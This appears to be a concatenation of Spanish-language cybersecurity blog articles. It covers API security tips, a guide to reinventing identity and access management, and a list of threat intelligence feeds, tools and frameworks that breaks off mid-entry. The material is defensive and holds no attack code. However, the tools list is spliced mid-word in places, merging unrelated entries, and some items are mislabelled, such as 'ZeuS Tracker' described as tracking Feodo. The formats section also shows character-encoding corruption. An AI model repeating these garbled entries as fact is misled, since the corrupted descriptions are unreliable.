todos deben ser capaces de leer el blog de la intranet. La organización necesita asegurar que los datos corporativos se mantengan seguros. Cada vez más, las empresas cifran la información desde el inicio hasta la eliminación. Anteriormente, los datos se cifraban principalmente cuando se desplazaban de un lugar a otro de la red, donde, con el cifrado, si los tipos malos de alguna manera entran, idealmente no pueden ver nada de valor. ## 6. Revisar los datos Back End Las empresas pasan mucho tiempo y esfuerzo asegurando la información Front End, pero los atacanques como los gusanos , pueden complicar la existencia de los datos en los sistemas. Las empresas necesitan establecer otro punto de control en la salida de la red. Si el delincuente accede a información confidencial, sólo tiene valor si puede moverla a sus propios sistemas. En otras palabras, debemos asegurarnos no solo que no puedan verse los datos, sino de que dan con ellos, no se los puedan llevar. ## 7. Echa un vistazo a las herramientas de seguridad API Las nuevas herramientas que ayudan a los desarrolladores a administrar APIs se están desarrollando desde una variedad de fuentes , que van desde start-ups hasta proveedores establecidos. Veremos miles de herramientas y proveedores, tanto para la gestión de seguridad en tiempo de ejecución como para la detección de vulnerabilidades de diseño / desarrollo y pruebas. Estas herramientas incluyen elementos como las exploraciones de seguridad preconfiguradas que comprueban el código y las posibles fallas, como el análisis sintáctico y los problemas de manejo de datos inadecuados. ## 8. Presupuesto para pruebas de seguridad Las pruebas de seguridad requieren tiempo y dinero, y las empresas necesitan inversión en seguridad. Mientras que la nueva funcionalidad impulsa el desarrollo, entre el 5 y el 10 por ciento del presupuesto de los proyectos deben asignarse a las pruebas de seguridad. Idealmente, el equipo de seguridad corporativa ha desarrollado procesos y procedimientos sólidos y repetibles, por lo que no es necesario iniciar el proceso desde cero con cada nuevo proyecto. El uso de las APIs está aumentando y las empresas están capacitadas para crear aplicaciones más dinámicas y de una forma mucho más rápida. Sin embargo, al aprovechar estas capacidades, las organizaciones deben ser conscientes de los posibles fallos de seguridad. --- # Reinventando la gestión de identidad y acceso de tu organización URL: https://ciberseguridad.blog/reinventando-la-gestion-de-identidad-y-acceso-de-tu-organizacion/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-10-07 Actualizado: 2026-10-04 Tema: Gestion de Identidades y Accesos > Es necesario reinventar la gestión de identidad y acceso. A través de este post, intentaremos ver las mejores prácticas y posibles problemas. Es necesario reinventar la gestión de identidad y acceso, y por ello, a través de este post, intentaremos ver las mejores prácticas y los problemas comunes con los que nos encontraremos. Incluiremos perspectivas sobre temas de gran importancia como el uso de IDaaS o nuevas tecnologias que han llegado para quedarse. ## Motivación - Los requisitos de IAM están evolucionando rápidamente para satisfacer las nuevas necesidades empresariales digitales y para proteger mejor los sistemas de las amenazas digitales y las herramientas IAM existentes a menudo no son suficientes para las nuevas tareas de IAM. - Segun Gartner, el 63% declaró que sus organizaciones planean actualizar al menos un módulo de IAM en los próximos dos años. La razón más común es que su solución IAM existente no responde a sus nuevos requerimientos. - A veces los problemas de IAM se deben a las limitaciones de los productos existentes, pero otras veces son inherentes a la dificultad o complejidad de la iniciativa IAM. - Las herramientas están mejorando, pero es posible que tengamos que tomar decisiones al elegir las ofertas de IAM. - Muchas organizaciones todavía están usando sistemas de IAM de diseño propio, los cuales están llegando al final de su vida útil. Una organizacion no debe escribir su propio software IAM desde cero, a día de hoy, muchas opciones pueden extenderse hasta el nivel API para satisfacer las necesidades específicas de la organización. ## Recomendaciones - Haz que la agilidad de IAM sea una prioridad. La reimplementación debe mover a la organización hacia el apoyo de los accesos seguros y apropiados desde cualquier lugar a cualquier lugar, por cualquier persona o cualquier cosa. - Incorpora los últimos avances tecnológicos en IAM ofreciendo capacidades en los proceso de planificación. Algunas nuevas tecnologías están causando que las funciones de IAM converjan (por ejemplo SSO, EMM y MFA). Las tecnologías de análisis de identidad permiten que los procesos de IAM, como la certificación de acceso, se tengan que diseñar completamente, por ello, si hace ya varios años desde que empezaste a implementar funciones IAM, es muy probable todo esto ya haya cambiado mucho. ## FrameWork de reimplementación IAM El FrameWork IAM proporciona la estructura para la planificación inicial de una reinvención de Gestión de Identidad y Accesos. Una reinvención IAM es un proyecto para reemplazar las herramientas y procesos existentes de IAM con nuevas herramientas y procesos, donde junto con las tareas de trabajos previo y seguimiento, podemos diferenciar tres principales componentes: [Imagen: Framework de Gestion de Identidad] ## 0. Documentar el estado actual Antes de cualquier reimplementación significativa en TI, es importante entender el estado actual de la implementación existente. Esta práctica de ingeniería de sistemas es un paso especialmente importante para las reinvenciones de la gestión de identidad y acessoc de hoy en día.Muchas organizaciones están tentadas a saltarse este paso porque sienten que ya entienden lo que tienen. Pero pensar esto, es estar miope. No se puede saber a dónde vas si no sabes dónde has estado. A veces el problema se debe a una limitaciones del producto del proveedor que se está utilizando, pero el problema es a menudo inherente a la dificultad o complejidad de la iniciativa IAM en particular. En tal caso, esto sólo incurrirá en más costos. ## 1. Crear una visión de arquitectura El proyecto de reinvención debe llevarse a cabo en el contexto de una visión general de Gestión de Identidad y Accessos. Cada proyecto de IAM no sólo debe proporcionar un valor medible sino también mover a la organización más cerca de las metas generales de IAM. Por lo tanto, el primer paso si tu organización aún no lo ha hecho es crear una visión de la arquitectura para sus capacidades de IAM, incluyendo componentes a corto, mediano y largo plazo. Siendo la visión a más largo plazo , una visión de tres a cinco años que se extienda más allá de la línea del tiempo de la iniciativa actual para proporcionar cierta perspectiva. Esta visión de la arquitectura servirá como una guía para las decisiones a tomar. Por ejemplo, una visión Cloud de gestión de identidad, primeramente guiaría a la organización a una estrategia de despliegue cloud, donde es probable que tengamos que incluir un soporte robusto para las actuales y futuras aplicaciones SaaS. ### Involucrar al negocio de forma temprana Esta es una buena práctica estándar, pero en un período de transformación digital, este paso se ha vuelto más importante todabía. Al considerar una visión de la arquitectura a largo plazo de la gestión de identidad , es crucial involucrar a la parte comercial para entender las metas y objetivos del negocio, anticipandose a las necesidades futuras de IAM. Los grupos que llevan la gestión de identidad dentro de la organización, se encuentran que a menudo las unidades de negocios ya han tomado decisiones e incluso implementado herramientas de IAM en puntos concretos. Idealmente, las organizaciones deben identificar nuevas iniciativas comerciales en el proceso de planificación que requerieran del apoyo de IAM. ### Determinar qué usuarios y que cosas necesitan activar La definición de funciones de IAM varía según el grupo de usuarios. Por lo tanto, es importante comenzar con un claro entendimiento sobre qué tipos de usuarios o "cosas" necesitan acceso bajo el alcance de las iniciativas de reinvención de la gestión de la identidad y accesos estamos haciendo. Debido a la naturaleza de la transformación del negocio digital, es posible que nuestro próximo sistema IAM tenga que soportar más usuarios y cosas que el último, o tipos de accesos que anteriormente no habiamos planteado. ### Definir sus funciones de estado futuro por grupo de usuarios El siguiente paso es identificar las funciones necesarias para dar soporte a cada uno de estos grupos de usuarios / entidades. En este período de cambio IAM, es importante pensar ampliamente acerca de las necesidades a corto y largo plazo. Es necesario entender todas las dimensiones que han cambiado desde la última implementación de gestión de identidad y acceso. Gartner ha observado que las organizaciones que están decepcionadas con la funcionalidad de una solución que acababan de poner, es por que fallaron en considerar algunos requisitos. ### Realizar un análisis de posibles brechas o casos sin cubrir Aunque muchas organizaciones son conscientes de los costes, ahorrar dinero se queda en un segundo plano en algunos puntos. IDaaS sigue creciendo en popularidad, pero no es la solución correcta para todas las organizaciones o todos los casos de uso. Por ejemplo, algunas industrias todavía prefieren que el software IAM funcione en el local. Una minoría inesperadamente grande de organizaciones están planeando reinventarse usando soluciones de cosecha propia. En este punto Gartner advierte fuertemente de ciertos problemas a las organizaciones que planean este camino.Hay una serie de razones por las que las organizaciones a veces piensan que esto es una buena idea. Algunas creen que, debido a que tienen requisitos especiales, necesitan crear sus propios módulos de IAM. Otras piensan que, debido a que escribieron sus propios módulos IAM la última vez, tienen que hacerlo de nuevo en esta reinvención, o que es más fácil escribir su propio software. La solución, es que la mayoría de las organizaciones deben comenzar con una oferta comercial gratuita, de código abierto o IDaaS y extenderla a través de APIs y configuraciones según sea necesario. > Tener módulos a medida, hará que nos adaptemos más lentamente al cambio y requisitos tecnológicos ### Crear una lista de requisitos Una vez que la organización entiende todas las necesidades que deben ser consideradas como parte de la reinvención de gestión de identidad y accesos, debemos traducir estas necesidades en requisitos para buscar nuestra mejor opción, ya bien sea comercial , open source o similar. ## 2. Crear una hoja de ruta en fases Es posible que tu organización tenga una larga lista de requisitos. Por lo tanto, la priorización y el fasear son los pasos clave. Las fases son importantes no sólo porque los presupuestos son siempre finitos, sino porque los proyectos grandes son mucho más difíciles de manejar, teniendo grandes riesgos. Las organizaciones deben administrar su programa IAM como un viaje, no como un destino, estableciendo las expectativas de las iniciativas de IAM que necesitan atención continua. La gestión de identidad es un programa, no un proyecto de una sola vez. Incluso si se seleccionan los "mejores" productos y se realizan implementaciones "perfectas", todavía necesitamos realizar un mantenimiento continuo y desarrollar un despliegue a medida que cambie las necesidades y las tecnologías de la empresa. Las organizaciones deben adoptar un enfoque medido y realista para las fases de los proyectos de IAM. Una forma de hacerlo es mantener un proyecto de reinvención IAM en particular lo suficientemente pequeño como para lograr los resultados deseados en un marco de tiempo táctico ,por ejemplo, tres meses o menos. ### Determinar prioridades por oportunidades de negocio y riesgos. Las prioridades se establecen en función de factores como la eficiencia operacional de IAM y la habilitación del negocios. A veces, las prioridades de IAM son muy obvias. Puede haber un requisito de IAM que esté en la parte superior de la lista en función de la necesidad de apoyar una iniciativa comercial clave o de mitigar un riesgo inaceptable. Algunos ejemplos son la mejora de la experiencia del usuario consumidor mediante la consolidación de credenciales de inicio de sesión en todas las líneas de los productos y la satisfacción de los requisitos de cumplimiento, proporcionando un mejor control sobre el desprovisionamiento, pero otras veces, se requiere trabajo detras para descubrir todas las prioridades implícitas. ### Identificar las piezas IAM que requieren atención inmediata Antes de que un usuario o entidad pueda acceder a una aplicación, el usuario o la entidad por lo general necesita ser aprovisionado. Y antes de que un usuario pueda ser aprovisionado, la organización necesita crear una identidad para ese usuario o entidad. Esto significa que tener un directorio o una base de datos de usuario apropiada es la primera capa clave de base en IAM. Por lo tanto, uno de los primeros pasos es determinar si un enfoque en directorio es adecuado, si no es así, será difícil optimizar las capas posteriores. ### Identificar piezas IAM con dependencias. Un factor que probablemente ha cambiado desde nuestro último proyecto de IAM es que los módulos de IAM necesitan cada vez más, interoperar con otros módulos de IAM. Muchas funciones de gestión de identidad se están volviendo más inteligentes y, por lo tanto, necesitan comunicarse mucho más profundamente con otros módulos de IAM que antes. Esto significa que muchas implementaciones que anteriormente podrían considerarse por separado ahora necesitan ser coordinadas e interoperar. ### Alinear la hoja de ruta con el perfil de riesgo de negocio Un elemento de la planificación de IAM es la gestión de riesgos. Por lo tanto, las organizaciones deben adoptar un enfoque basado en el riesgo para priorizar los proyectos individuales de gestión de identidad y accesos. La pregunta a hacer es: ¿cuánto se reduce el riesgo por un proyecto de reimplementación de IAM en particular? Debemos defin el riesgo ampliamente al realizar este análisis previo. El riesgo tiene muchos componentes incluyendo el riesgo de acceso, el riesgo de cumplimiento, el riesgo presupuestario, el riesgo de operaciones, el riesgo de insatisfacción del cliente y los riesgos de fraude y amenazas cibernéticas, el riesgo es un pilar clave de este proyecto de reinvención. ## 3. Definir una arquitectura Para los propósitos de este análisis, el enfoque arquitectónico tiene dos componentes: la decisión de hacer o comprar y las opciones de implementación. La primera de ellas es la decisión de comprar o poder reutilizar lo que ya tenemos. No siempre es necesario realizar inversión nueva en software o infraestructura. ### Determinar el enfoque a crear o comprar Hay ventajas y desventajas de escribir nuestro propio software IAM desde cero. Las desventajas superan las ventajas. La mayoría de las organizaciones no deberian empezar a escribir su software IAM desde cero. Entonces, ¿cómo saber cuándo escribir tu propio IAM es una buena idea o una mala idea? En general, es una buena práctica usar software y servicios de IAM apoyados por un grupo especializado en dar soporte a ese software o servicio. Si somos realistas, muchas organizaciones tendrán que escribir algún módulo relacionado con IAM. Muchas organizaciones no son capaces de encontrar todas las características que necesitan en el software de bajo coste u ofertas de software de código abierto y, por lo tanto, necesitan escribir extensiones a las API existentes para proporcionar la funcionalidad que falta. Si no podemos encontrar el software que satisface todas nuestras necesidades, debemos extender el software a nivel de APIs. Pero lo mas importante, es que de nuestro nucleo debemos evitar cambiar el código en sí mismo porque esto puede hacer que el software sea quebradizo y difícil de actualizar. ### Definir el enfoque a implementación de alto nivel Las opciones principales son utilizar soluciones COTS de bajo coste, IDaaS, open-source o homegrown (Yo me lo guiso - Yo me lo como). Según un estudio realizado por Gartner, el porcentaje de organizaciones que usan o planean usar por lo menos algún software local en cualquiera de las nueve áreas de tecnologías de IAM varió del 22% al 27%. Dado el nivel de madurez de las ofertas de IAM disponibles hoy en día, la mayoría de las organizaciones no deberían comenzar las reimplementaciones de IAM escribiendo una nueva solución propia desde el principio o creando nuevas cosas a medida. Muchas funciones de IAM han estado disponibles como ofertas de bajo coste o de código abierto durante años, y para la mayoría de los casos de uso, no hay ninguna ventaja en reinventar la rueda. De hecho, puede haber desventajas significativas. Muchas organizaciones subestiman los costes y los riesgos asociados con la escritura de su propio software IAM, especialmente en el área de gestión de acceso. ### Buscar oportunidades de consolidación en grupos de usuarios Gartner aconseja a las organizaciones comenzar organizando las nuevas necesidades por parte de los usuarios. A medida que la organización continúa con la definición de reinvención IAM, podemos ser capaces de identificar áreas en las que diferentes grupos de usuarios pueden utilizar una infraestructura IAM común. Muchos proveedores IAM han añadido características a su oferta inicial de IAM para permitirles soportar múltiples grupos de usuarios en una sola plataforma. Algunos proveedores de IAM informan que más del 60% de sus implementaciones soportan múltiples grupos de usuarios, por ellos debemos tener en cuenta que estas implementaciones pueden implicar el despliegue de varias instancias para satisfacer las preocupaciones de seguridad y escalabilidad. ### Validar el enfoque arquitectónico con las necesidades de negocio El uso de los pasos anteriores para desarrollar un framework preliminar, es sólo el comienzo. A medida que se pasa a un diseño más detallado y la selección de proveedores para cada módulo que se está reimplementando, tendremos que validar que las compensaciones necesarias en tiempo de implementación, costo y funcionalidad permanezcan dentro de límites aceptables. La próxima fase de nuestra reinvención en gestión de identidad debe posicionar mejor a nuestra organización para las fases posteriores, incluyendo las metas de IAM a mediano y largo plazo. Los sistemas IAM se están volviendo más inteligentes y más interconectados. Por lo tanto, la planificación del programa de gestión de identidad y accesos debe ser algo estratégico. ## Planificación detallada con Quick Wins Es probable que, a medida que avancemos con la selección preliminar de proveedores para una fase específica, nuestra organización determine que necesitamos hacer compromisos en áreas particulares y si no son pedido, debemos ser nosotros los que marquemos los mismo. Las organizaciones recurren frecuentemente a los planes originales propuestos, y es sobre el mismo donde querran ver pequeños resultados a corto plazo. Como ya sabreis, la gestión de identidad es dificil de extrapolar a beneficios, por lo que deberemos demostrar que los beneficios que la misma nos va aportando, haciendo que el presupuesto apostado en la misma determine beneficios para el negocio. > Reinventar la gestión de identidad y accesos de nuestra organización es algo dificil, pero no imposible. --- # Los mejores recursos en Threat Intelligence URL: https://ciberseguridad.blog/los-mejores-recursos-en-threat-intelligence/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-09-30 Actualizado: 2026-09-29 Tema: Operaciones de Seguridad > La inteligencia de amenazas, también conocida como inteligencia de amenazas cibernéticas (CTI - Cyber Threat Intelligence ), es la organización, análisis y refinamiento de información sobre ataques potenciales o actuales que amenazan a una organización. El propósito principal de la inteligencia de amenazas cibernéticas es ayudar a las organizaciones a comprender los riesgos de las amenazas externas más comunes y severas, como amenazas de día cero, amenazas persistentes avanzadas ( APT ) o expl La inteligencia de amenazas, también conocida como inteligencia de amenazas cibernéticas (CTI - Cyber Threat Intelligence ), es la organización, análisis y refinamiento de información sobre ataques potenciales o actuales que amenazan a una organización. El propósito principal de la inteligencia de amenazas cibernéticas es ayudar a las organizaciones a comprender los riesgos de las amenazas externas más comunes y severas, como amenazas de día cero, amenazas persistentes avanzadas ( APT ) o exploits . Aunque los actores de la amenaza también incluyen amenazas internas (o insiders), el énfasis está en los tipos de amenazas que tienen más probabilidades de afectar el ambiente de una organización particular, y por ello, esta lista que os traigo de recursos para hacer frente al Cyber Threat Intelligence contempla desde fuentes , frameworks y herramientas hasta los mejores libros y artículos sobre el tema. ## Fuentes para la Threat Intelligence La mayoría de los recursos enumerados proporcionan un conjunto de listas y / o APIs para obtener información actualizada referente a las amenazas. Para crear inteligencia de amenaza, es necesario una cierta cantidad de análisis, ya bien sea de dominios o temas referentes al negocio. - Alexa Top 1 Millón : Probablemente lista blanca del top 1 millón de sitios de Amazon (Alexa). - Grupos y operaciones de APT : Una hoja de cálculo que contiene información e inteligencia sobre los grupos, operaciones y tácticas de APT. - AutoShun : Un servicio público que ofrece al menos 2000 IPs maliciosas y algunos más recursos. - Clasificación BGP : Ranking de los ASN con el contenido más malicioso. - Botnet Tracker : Rastreao de varias botnets activas. - BruteForceBlocker : BruteForceBlocker es un script perl que monitorea los registros sshd de un servidor e identifica los ataques de fuerza bruta, que luego usa para configurar automáticamente las reglas de bloqueo de firewall y enviar esas IPs al sitio del proyecto - C&C Tracker : Feed de direcciones IP C&C conocidas, activas y sin trafico, creado por Bambenek Consulting. - Lista de Armada CI : Subconjunto de la lista comercial del CINS Score , centrada en IPs de mala reputación que no están presentes en otras listas de amenazas. - Cisco Umbrella : Lista blanca del top 1 millón de sitios identificados por Cisco Umbrella (OpenDNS). - Intel Critical Stack : Inteligencia gratuita de amenazas analizadas y agregadas a Critical Stack, lista para su uso en cualquier sistema de producción. Se puede especificar los feed que deseamos seguir - C1fApp : Es una aplicación de feed de amenazas, que proporcionan un solo feed, tanto Open Source como privado. Proporciona tableros de estadísticas, API abierta para la búsqueda , útil y ejecutandose desde hace unos años. Las búsquedas son datos históricos. - Cymon : Cymon es un agregador de indicadores de múltiples fuentes con historico, por lo que tiene una interfaz única para múltiples amenazas. También proporciona una API para buscar en una base de datos junto con una bonita interfaz web. - Dominios de correo electrónico desechables : Una colección de dominios de correo electrónico anónimos o desechables comúnmente utilizados para servicios de spam / abuso. - Reglas de Firewall de amenazas emergentes : Una colección de reglas para varios tipos de firewalls, incluyendo iptables, PF y PIX. - Amenazas emergentes Reglas IDS : Colección de reglas de Snort y Suricata que se pueden utilizar para alertar o bloquear. - ExoneraTor : El servicio ExoneraTor mantiene una base de datos de direcciones IP que forman parte de la red Tor. Responde a la pregunta de si hubo una Hub Tor en una dirección IP dada en una fecha determinada. - Exploitalert : Listado de los últimos exploit lanzados. - ZeuS Tracker : El tracker de Feodo abuse.ch que sigue el troyano Feodo. - Listas FireHOL IP : +400 IPs públicas disponibles en Feeds analizados para documentar su evolución, geolocalización, edad de IPs, política de retención, solapamientos. Centrado en el delito cibernético (ataques, abuso, malware). - FraudGuard : FraudGuard es un servicio diseñado para proporcionar una forma fácil de validar el uso recopilando y analizando continuamente el tráfico de Internet en tiempo real. - Hail a TAXII.com : Hail a TAXII.com es un repositorio de fuentes de Cyber Threat Intelligence de código abierto en formato STIX. Ofrecen varios feeds, incluyendo algunos que se enumeran aquí ya en un formato diferente, como las reglas de amenazas emergentes y feeds PhishTank. - Honeydb : HoneyDB proporciona datos en tiempo real de la actividad del honeypot. Estos datos provienen de honeypots desplegados en Internet utilizando el honeypot Honeypy. HoneyDB proporciona acceso API a la actividad de honeypot recopilada, que también incluye datos agregados de varios feeds de Twitter de honeypots. - I-Blocklist : I-Blocklist mantiene varios tipos de listas que contienen direcciones IP pertenecientes a varias categorías. Algunas de estas categorías principales incluyen países, ISPs y organizaciones. Otras listas incluyen ataques web, TOR, spyware y proxies. Muchas son libres de uso y están disponibles en varios formatos. - Majestic Million : Lista blanca Top 1 millón de sitios web clasificado por Majestic. Los sitios se ordenan por el número de subredes referentes enlazadas. - MalShare.com : El proyecto MalShare es un repositorio público de malware que proporciona a los investigadores acceso gratuito a las muestras. - MalwareDomains.com : El proyecto DNS-BH crea y mantiene una lista de dominios que se sabe que se utilizan para propagar malware y spyware. Estos pueden ser utilizados para la detección, así como la prevención (Solicitudes sinkholing en DNS). - Metadefender.com : Las fuentes de detección de amenazas de nube de Metadefender contienen nuevas firmas hash de malware, incluyendo MD5, SHA1 y SHA256. Siendo estos nuevos hashes maliciosos detectados por Metadefender Cloud en las últimas 24 horas. Los feeds se actualizan diariamente con malware recientemente detectado y reportado para proporcionar inteligencia de amenazas a tiempo y acción de los mismos. - Minotauro : El Proyecto Minotauro es un proyecto de investigación en curso por el equipo de NovCon Solutions . Se está forjando como un centro para los profesionales de seguridad, investigadores y entusiastas , pudiendo descubrir nuevas amenazas y mitigaciones. Es una combinación de software opensource de terceros, datasets locales, nuevas herramientas de análisis y mucho más. - Servicios NormShield : NormShield Services proporciona información de miles de dominios (incluida la información whois) de la que pueden surgir ataques potenciales de phishing. Hay inscripción gratuita para los servicios públicos para el monitoreo continuo. - Feeds de OpenPhish : OpenPhish recibe la URL de múltiples flujos y los analiza utilizando sus algoritmos de detección de phishing. Hay ofertas gratuitas y comerciales disponibles. - Phishtank : PhishTank entrega una lista de URLs de phishing sospechosas. Sus datos provienen de informes humanos, pero también se alimentan de información externa cuando es posible. Es un servicio gratuito, pero a veces es necesario registrarse para tener una clave de API. - Ransomware Tracker : Ransomware Tracker creado por abuse.ch realiza un seguimiento y monitorización del estado de los nombres de dominio, direcciones IP y URL asociadas a Ransomware, como servidores Botnet C&C, sitios de distribución y sitios de pago. - Dominios sospechosos SANS ICS : Las listas de amenazas de dominios sospechosos de SANS ICS rastrea dominios sospechosos. Ofrece 3 listas clasificadas como de alta , media o baja sensibilidad, donde la lista de alta sensibilidad tiene menos falsos positivos, mientras que la lista de baja sensibilidad dispone de más falsos positivos. Así como una lista blanca aprobada de dominios. - Base de firmas : Una base de datos de firmas utilizadas en otras herramientas creado por Neo23x0. - Proyecto Spamhaus : El Proyecto Spamhaus contiene múltiples listas de amenazas asociadas con la actividad de spam y malware. - Lista negra de SSL : SSL Blacklist (SSLBL) es un proyecto mantenido por abuse.ch. El objetivo es proporcionar una lista de "malos" certificados SSL identificados por abuse.ch para asociarse con actividades de malware o botnet. SSLBL se basa en las huellas SHA1 de los certificados SSL maliciosos ofreciendo varias listas negras. - Top 1 Million Statvoo : Lista blanca deL top 1 millón de sitios web, según la clasificación de Statvoo. - Strongarm : Strongarm es un blackhole de DNS que toma medidas sobre los indicadores de compromiso al bloquear el control y los comandos del malware. Strongarm agrega fuentes de indicadores gratuitas, se integra con los feeds comerciales, utiliza los feeds de IOC de Percipient y resuelve DNS y APIs para su uso para proteger la red. Strongarm es gratis para uso personal. - Talos Aspis : El proyecto Aspis es una colaboración cerrada entre Talos y los proveedores de alojamiento para identificar y disuadir a los principales actores de las amenazas. Talos comparte su experiencia, recursos y capacidades, incluyendo análisis forense de redes y sistemas, ingeniería inversa e inteligencia de amenazas sin costo para los proveedores. - Threatglass : Una herramienta online para compartir, explorar y analizar malware basado en web. Threatglass permite a los usuarios examinar gráficamente las infecciones del sitio web mediante la visualización de capturas de pantalla de las etapas de la infección, así como mediante el análisis de las características de red, las relaciones con el host y las capturas de paquetes. ## Herramientas Threat Intelligence Todo tipo de herramientas para analizar, crear y editar Threat Intelligence. Mayormente basado en el COI. - ActorTrackr : ActorTrackr es una aplicación web de código abierto para almacenar / buscar / enlazar datos relacionados con actores. Las fuentes principales son de usuarios y varios repositorios públicos. Fuente disponible en GitHub. - AIEngine : AIEngine es un motor de inspección de paquetes interactivo / programable en Python / Ruby / Java / Lua con capacidades de aprendizaje sin intervención humana, funcionalidad NIDS (Network Intrusion Detection System), clasificación de dominio DNS, colector de red, forense de redes y muchos otros. Disponible en Bitbucket. - Animus Omni CLI : El Animus Omni CLI le ayuda a separar la señal del ruido en los archivos de registro. Las exploraciones no dirigidas están inundando Internet, obstruyendo archivos de registro y haciendo difícil encontrar los acontecimientos legítimos. Esta utilidad aprovecha la API Ara distribuida que permite compartir información de seguridad y amenazas dentro y entre comunidades para un ecosistema colectivamente más fuerte. Ofrece múltiples opciones de configuración, Interflow permite a los usuarios decidir qué comunidades formar, de qué datos se alimentan para consumir y con quién. Interflow se encuentra actualmente en beta privada. - Malstrom : Malstrom pretende ser un repositorio para el seguimiento de amenazas y artefactos forenses, pero también almacena reglas YARA y notas para la investigación. - MANTIS : Análisis basado en modelos de fuentes Threat Intelligence (MANTIS) Cyber Threat Intelligence Management Framework soporta la gestión de la inteligencia de amenazas cibernéticas expresada en varios lenguajes estándar, como STIX y CybOX. Pero, no está listo para la producción a gran escala. - Megatron : Megatron es una herramienta implementada por CERT-SE que recopila y analiza las direcciones IP incorrectas, puede ser utilizado para calcular estadísticas, convertir y analizar archivos de registro y en el manejo de abusos e incidentes. - MineMeld : Un framework de procesamiento extensible de Threat Intelligence creado por las redes de Palo Alto. Puede utilizarse para manipular listas de indicadores y transformarlas y / o agregarlas para el consumo por parte de una infraestructura de ejecución de terceros. - MISP : La plataforma de intercambio de información de malware (MISP) es una solución de software de código abierto para recopilar, almacenar, distribuir y compartir indicadores de seguridad cibernética y análisis de malware. - OpenIOC : OpenIOC es un framework open source para compartir Threat Intelligence. Está diseñado para intercambiar información de amenazas tanto interna como externamente en un formato digerido a máquina. - OpenTAXII : OpenTAXII es una robusta implementación Python de servicios TAXII que ofrece un rico conjunto de características y una API en Pythonic construida sobre una aplicación bien diseñada. - OSTrICa : Es un framework orientado a plugins de código abierto para recopilar y visualizar información Threat Intelligence. - AlienVault Open Threat Exchange : AlienVault Open Threat Exchange (OTX) proporciona acceso abierto a una comunidad global de investigadores de amenazas y profesionales de la seguridad. Proporciona datos de amenazas generados por la comunidad, permite la investigación colaborativa y automatiza el proceso de actualización de la infraestructura de seguridad con datos de amenazas desde cualquier fuente. - Open Threat Partner eXchange : El Open Threat Partner eXchange (OpenTPX) consiste en formatos de código abierto y herramientas para intercambiar información de inteligencia de amenazas legible por máquina y datos de operaciones de seguridad de red. Es un formato basado en JSON que permite compartir datos entre sistemas conectados. - PassiveTotal : La plataforma PassiveTotal ofrecida por RiskIQ es una plataforma de análisis de amenazas que proporciona a los analistas el mayor número de datos posible para prevenir ataques antes de que sucedan. - Recorded Future : Recorded Future es un producto SaaS premium que unifica automáticamente la inteligencia de amenazas de fuentes abiertas / cerradas y técnicas en una sola solución. Su tecnología utiliza el procesamiento del lenguaje natural (NLP) y el aprendizaje automático para entregar esa inteligencia de amenazas en tiempo real, convirtiendo a Recorded Future en una opción popular para los equipos de seguridad de TI. - [**Scumblmación sobre amenazas cibernéticas a través de los límites de la organización y los productoss / servicios. TAXII define conceptos, protocolos y intercambios de mensajes para intercambiar información de amenazas cibernéticas para la detección, prevención y mitigación de amenazas cibernéticas. - VERIS El vocabulario para la grabación de eventos y la distribución de incidentes (VERIS) es un conjunto de métricas diseñadas para proporcionar un lenguaje común para describir incidentes de seguridad de una manera estructurada y repetible. VERIS es una respuesta a uno de los desafíos más críticos y persistentes en la industria de la seguridad: la falta de información de calidad. Además de proporcionar un formato estructurado, VERIS también recopila datos de la comunidad para informar sobre las infracciones en el informe de investigaciones de violación de datos de Verizon ( DBIR ) y publica una base de datos online. ## Frameworks Threat Intelligence y plataformas Frameworks, plataformas y servicios para recolectar, analizar, crear y compartir Inteligencia de amenazas. - AbuseHelper : AbuseHelper es un frameworks de código abierto para recibir y redistribuir fuentes de abuso y amenazas. - AIS : La capacidad libre de intercambio automatizado de indicadores (AIS) del Departamento de Seguridad Nacional (DHS) permite el intercambio de indicadores de amenazas cibernéticas entre el Gobierno Federal y el sector privado a velocidad máquina. Los indicadores de amenazas tienen información como direcciones IP maliciosas o la dirección del remitente de un correo electrónico de phishing, aun que también pueden ser mucho más complicadas. - Barncat : Fidelis Cybersecurity ofrece acceso gratuito a Barncat después de registrarte. La plataforma está destinada a ser utilizada por CERTs, investigadores, gobiernos, ISPs y otras organizaciones grandes. La base de datos contiene varios ajustes de configuración utilizados por los atacantes. - Bearded Avenger : La forma más rápida de consumir inteligencia de amenazas. El sucesor de CIF. - Red de intercambio de amenazas Blueliv : Permite a los participantes compartir indicadores de amenazas con la comunidad. - CRITS : CRITS es una plataforma que ofrece a los analistas los medios para llevar a cabo una investigación conjunta sobre malware y amenazas en seguridad. Se conecta a un repositorio centralizado de datos de inteligencia, pero también se puede utilizar como una instancia privada. - CIF : El Framework de Inteligencia Colectiva (CIF) te permite combinar información de amenazas maliciosas conocidas de muchas fuentes y utilizar esa información para IR, detección y mitigación. El código está disponible en GitHub. - IntelMQ : IntelMQ es una solución para CERTs para recopilar y procesar los feeds de seguridad, pastebins, tweets usando un protocolo de cola de mensajes. Es una iniciativa impulsada por la comunidad denominada IHAP (Incident Handling Automation Project), diseñada conceptualmente por los CERT europeos durante varios eventos de seguridad informática. Su objetivo principal es dar a los técnicos de incidentes una manera fácil de recopilar y procesar la inteligencia de amenazas mejorando los procesos de manejo de incidentes de los CERT. - Interflow : Interflow es una plataforma de intercambio de información sobre seguridad y amenazas creada por Microsoft para profesionales que trabajan en ciberseguridad. Utiliza una arquitectuenriquecimiento de datos. El énfasis de ThreatMiner no es sólo sobre los indicadores de compromiso (IoC), sino también proporcionar a los analistas información contextual relacionada con el IoC que están viendo. - VirusShare : VirusShare.com es un repositorio de muestras de malware proporcionado a los investigadores de seguridad, la respuesta a incidentes, los analistas forenses y el curioso acceso a muestras de código malicioso. El acceso al sitio se concede únicamente por invitación. - Yara-Reglas : Un repositorio de código abierto con diferentes firmas Yara que se compilan, clasifican y mantienen lo más actualizado posible. Si recordáis, ya vimos que son las reglas yara en un post anterior. - ZeuS Tracker : ZeuS Tracker de abuse.ch rastrea servidores ZeuS Command & Control (hosts) en todo el mundo y le proporciona un dominio y la añade a una lista de IPs bloqueadas. ## Formatos para la Threat Intelligence Formatos estandarizados para compartir Inteligencia de amenazas, en su mayor√≠a indicadores de compromiso. - CAPEC : Clasificaci√≥n de Patrones de Ataque Comunes (CAPEC) es un completo diccionario y taxonom√≠a de clasificaci√≥n de ataques conocidos que pueden ser utilizados por analistas, desarrolladores, probadores y educadores para avanzar en la comprensi√≥n de la comunidad de ciberseguridad y mejorar las defensas. - CybOX : El 